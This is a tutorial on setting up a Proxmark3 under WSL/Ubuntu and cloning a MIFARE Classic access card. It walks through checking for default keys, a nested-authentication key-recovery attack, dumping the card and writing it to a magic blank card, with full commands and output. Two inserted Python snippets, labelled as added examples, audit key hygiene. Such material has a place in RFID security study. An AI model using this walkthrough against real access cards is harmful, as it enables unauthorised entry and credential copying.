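PM3 environment setup and M1 card cloning
PM3 environment setup
Setting up the environment on Windows is fairly painful. If you have a virtual machine you can use that; I strongly recommend WSL (Windows Subsystem for Linux), which is very friendly.
The following describes the Ubuntu-based setup, following the PM3 wiki.
First, check for updates: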
sudo apt-get update && sudo apt-get upgrade
Then install the required tools:
sudo apt install p7zip git build-essential libreadline5 libreadline-dev libusb-0.1-4 libusb-dev libqt4-dev perl pkg-config wget libncurses5-dev gcc-arm-none-eabi libstdc++-arm-none-eabi-newlib libpcsclite-dev pcscd
Fetch the source:
git clone https://github.com/proxmark/proxmark3.git
You can of course use third-party firmware instead, such as Iceman:
git clone https://github.com/RfidResearchGroup/proxmark3.git
Then pull the latest changes and configure permissions:
cd proxmark3
git pull
sudo cp -rf driver/77-mm-usb-device-blacklist.rules /etc/udev/rules.d/77-mm-usb-device-blacklist.rules
sudo udevadm control --reload-rules
sudo adduser $USER dialout
Build the source:
make clean && make all
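Now the PM3 can be plugged in. Because I am using WSL, Ubuntu shares the serial ports with the host, so the port number has to be determined first. Mine is COM7, which WSL exposes as /dev/ttyS7, so I can connect directly: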
sudo ./proxmark3 /dev/ttyS7
Cracking the M1 card
First identify the card type. Start by checking the antenna signal with no card present:
proxmark3> hw tune
Measuring antenna characteristics, please wait.........
# LF antenna: 24.61 V @ 125.00 kHz
# LF antenna: 29.84 V @ 134.00 kHz
# LF optimal: 31.21 V @ 130.43 kHz
# HF antenna: 24.53 V @ 13.56 MHz
Displaying LF tuning graph. Divisor 89 is 134khz, 95 is 125khz.
Place the card on the HF area and measure the antenna signal again:
Measuring antenna characteristics, please wait.........
# LF antenna: 25.16 V @ 125.00 kHz
# LF antenna: 30.94 V @ 134.00 kHz
# LF optimal: 32.31 V @ 130.43 kHz
# HF antenna: 19.60 V @ 13.56 MHz
Displaying LF tuning graph. Divisor 89 is 134khz, 95 is 125khz.
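The HF voltage changes noticeably, so this is a high-frequency card; the same method can also be used to identify low-frequency cards. A further command identifies the card as an M1 card:
proxmark3> hf search
UID : 60 64 7d 26
ATQA : 00 04
SAK : 08 [2]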
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
No chinese magic backdoor command detected
Prng detection: WEAK
Valid ISO14443A Tag Found - Quiting Search
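The antenna-voltage comparison described above can be automated. The following is an added example, not part of the original post or of the Proxmark3 project; the function names and the 10% drop threshold are assumptions, and the sample readings are the two `hw tune` outputs shown on this page.

```python
import re

# Constructed samples: the two `hw tune` readings shown on this page.
NO_CARD = """# LF antenna: 24.61 V @ 125.00 kHz
# LF antenna: 29.84 V @ 134.00 kHz
# LF optimal: 31.21 V @ 130.43 kHz
# HF antenna: 24.53 V @ 13.56 MHz"""
WITH_CARD = """# LF antenna: 25.16 V @ 125.00 kHz
# LF antenna: 30.94 V @ 134.00 kHz
# LF optimal: 32.31 V @ 130.43 kHz
# HF antenna: 19.60 V @ 13.56 MHz"""

LINE = re.compile(r"#\s*(LF|HF) (antenna|optimal):\s*([\d.]+) V @\s*([\d.]+) (kHz|MHz)")

def parse_tune(text):
    """Map (band, frequency) -> volts for each fixed-frequency antenna line."""
    readings = {}
    for band, kind, volts, freq, unit in LINE.findall(text):
        if kind == "antenna":  # the "optimal" frequency can shift, so skip it
            readings[(band, f"{freq} {unit}")] = float(volts)
    return readings

def classify(baseline, loaded, min_drop=0.10):
    """Return (band or None, relative drops); min_drop is an assumed threshold."""
    base, load = parse_tune(baseline), parse_tune(loaded)
    drops = {k: (base[k] - load[k]) / base[k] for k in base if k in load}
    if not drops:
        return None, drops
    key = max(drops, key=drops.get)  # antenna loaded most by the card
    band = key[0] if drops[key] >= min_drop else None
    return band, drops

if __name__ == "__main__":
    band, drops = classify(NO_CARD, WITH_CARD)
    for (b, freq), d in drops.items():
        print(f"{b} @ {freq}: {d:+.1%}")
    print("card band:", band)
```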
Check whether the sectors use default keys:
proxmark3> hf mf chk *1 ? t
--chk keys. sectors:16, block no: 0, key type:?, eml:y, dmp=n checktimeout=471 us
No key specified, trying default keys
chk default key[ 0] ffffffffffff
chk default key[ 1] 000000000000
chk default key[ 2] a0a1a2a3a4a5
chk default key[ 3] b0b1b2b3b4b5
chk default key[ 4] aabbccddeeff
chk default key[ 5] 1a2b3c4d5e6f
chk default key[ 6] 123456789abc
chk default key[ 7] 010203040506
chk default key[ 8] 123456abcdef
chk default key[ 9] abcdef123456
chk default key[10] 4d3a99c351dd
chk default key[11] 1a982c7e459a
chk default key[12] d3f7d3f7d3f7
chk default key[13] 714c5c886e97
chk default key[14] 587ee5f9350f
chk default key[15] a0478cc39091
chk default key[16] 533cb6c723f6
chk default key[17] 8fd0a4f256e9
To cancel this operation press the button on the proxmark...
--o
|---|----------------|----------------|
|sec|key A |key B |
|---|----------------|----------------|
|000| ffffffffffff | ffffffffffff |
|001| ? | ? |
|002| ffffffffffff | ffffffffffff |
|003| ? | ? |
|004| ffffffffffff | ffffffffffff |
|005| ffffffffffff | ffffffffffff |
|006| ffffffffffff | ffffffffffff |
|007| ffffffffffff | ffffffffffff |
|008| ffffffffffff | ffffffffffff |
|009| ffffffffffff | ffffffffffff |
|010| ffffffffffff | ffffffffffff |
|011| ffffffffffff | ffffffffffff |
|012| ffffffffffff | ffffffffffff |
|013| ffffffffffff | ffffffffffff |
|014| ffffffffffff | ffffffffffff |
|015| ffffffffffff | ffffffffffff |
|---|----------------|----------------|
28 keys(s) found have been transferred to the emulator memory
For detailed usage of each command, run help yourself.
Some sectors turn out to use the default key ffffffffffff.
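For a card issuer, the same client output doubles as an audit input. The following added example (not from the original post or the Proxmark3 project) parses the `hf search` result and the sector key table, in either the `chk` or the `nested` layout, and reports which sectors rely on default keys; the function names and the `DEFAULT_KEYS` subset are assumptions, and the sample text is abridged from the output on this page.

```python
import re

# Constructed samples, abridged from the client output shown on this page.
HF_SEARCH = """UID : 60 64 7d 26
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
No chinese magic backdoor command detected
Prng detection: WEAK
"""
CHK_TABLE = """|sec|key A |key B |
|000| ffffffffffff | ffffffffffff |
|001| ? | ? |
|002| ffffffffffff | ffffffffffff |
|003| ? | ? |
"""
# Assumption: a subset of the default keys the client tried in the listing above.
DEFAULT_KEYS = {"ffffffffffff", "000000000000", "a0a1a2a3a4a5", "b0b1b2b3b4b5"}

KEY = r"([0-9a-fA-F]{12}|\?)"
# Matches rows of the chk table and of the nested table (which adds "res" columns).
ROW = re.compile(r"^\|(\d{3})\|\s*" + KEY + r"\s*\|(?:\s*[01]\s*\|)?\s*" + KEY + r"\s*\|")

def parse_key_table(text):
    """Return {sector: (key_a, key_b)}; None marks a key that was not found."""
    table = {}
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            a, b = (None if k == "?" else k.lower() for k in m.group(2, 3))
            table[int(m.group(1))] = (a, b)
    return table

def audit_card(search_text, table_text):
    """Summarise key hygiene for one card from hf search + key-table output."""
    table = parse_key_table(table_text)
    default = sorted(s for s, ks in table.items() if DEFAULT_KEYS & set(ks))
    unknown = sorted(s for s, ks in table.items() if None in ks)
    weak_prng = re.search(r"Prng detection:\s*WEAK", search_text) is not None
    findings = []
    if default:
        findings.append(f"default key on sectors {default}")
    if weak_prng and default and unknown:
        # One known sector key is enough to expose the others on this card type.
        findings.append(f"custom keys on sectors {unknown} offer no protection")
    return {"default": default, "unknown": unknown,
            "weak_prng": weak_prng, "findings": findings}

if __name__ == "__main__":
    for finding in audit_card(HF_SEARCH, CHK_TABLE)["findings"]:
        print(finding)
```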
The M1 card has a vulnerability: the key of a known sector can be used to crack the keys of the encrypted sectors.
proxmark3> hf mf nested 1 0 A FFFFFFFFFFFF d
--nested. sectors:16, block no: 0, key type:A, eml:n, dmp=y checktimeout=471 us
Testing known keys. Sector count=16
nested...
-----------------------------------------------
uid:60647d26 trgbl=4 trgkey=0
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=4 trgkey=1
Setting authentication timeout to 103us
Found valid key:01206f340100
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=0
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=4 trgkey=0
Setting authentication timeout to 103us
Found valid key:112233445566
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=0
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=0
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=0
Setting authentication timeout to 103us
Found valid key:50f6a442e26d
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
Found valid key:e59925b18b43
-----------------------------------------------
Nested statistic:
Iterations count: 17
Time in nested: 8.851 (0.521 sec per key)
|---|----------------|---|----------------|---|
|sec|key A |res|key B |res|
|---|----------------|---|----------------|---|
|000| ffffffffffff | 1 | ffffffffffff | 1 |
|001| 112233445566 | 1 | 01206f340100 | 1 |
|002| ffffffffffff | 1 | ffffffffffff | 1 |
|003| 50f6a442e26d | 1 | e59925b18b43 | 1 |
|004| ffffffffffff | 1 | ffffffffffff | 1 |
|005| ffffffffffff | 1 | ffffffffffff | 1 |
|006| ffffffffffff | 1 | ffffffffffff | 1 |
|007| ffffffffffff | 1 | ffffffffffff | 1 |
|008| ffffffffffff | 1 | ffffffffffff | 1 |
|009| ffffffffffff | 1 | ffffffffffff | 1 |
|010| ffffffffffff | 1 | ffffffffffff | 1 |
|011| ffffffffffff | 1 | ffffffffffff | 1 |
|012| ffffffffffff | 1 | ffffffffffff | 1 |
|013| ffffffffffff | 1 | ffffffffffff | 1 |
|014| ffffffffffff | 1 | ffffffffffff | 1 |
|015| ffffffffffff | 1 | ffffffffffff | 1 |
|---|----------------|---|----------------|---|
Printing keys to binary file dumpkeys.bin...
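The keys of the other encrypted sectors have been cracked and written to dumpkeys.bin. This file has to be converted to a format the PM3 understands before the access card can be copied: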
proxmark3> script run dumptoemul.lua
--- Executing: ./scripts/dumptoemul.lua, args''
Wrote an emulator-dump to the file 2CF0550B.eml
-----Finished
proxmark3>
Then place the blank card on the HF area and write the data to it:
proxmark3> hf mf cload 60647D26
Chinese magic backdoor commands (GEN 1a) detected
Loading magic mifare 1K
Loaded from file: 60647D26.eml
All done!!!
References:
https://github.com/Proxmark/proxmark3/wiki/Ubuntu-Linux
https://www.cnblogs.com/k1two2/p/5706516.html
https://lzy-wi.github.io/2018/07/26/proxmark3/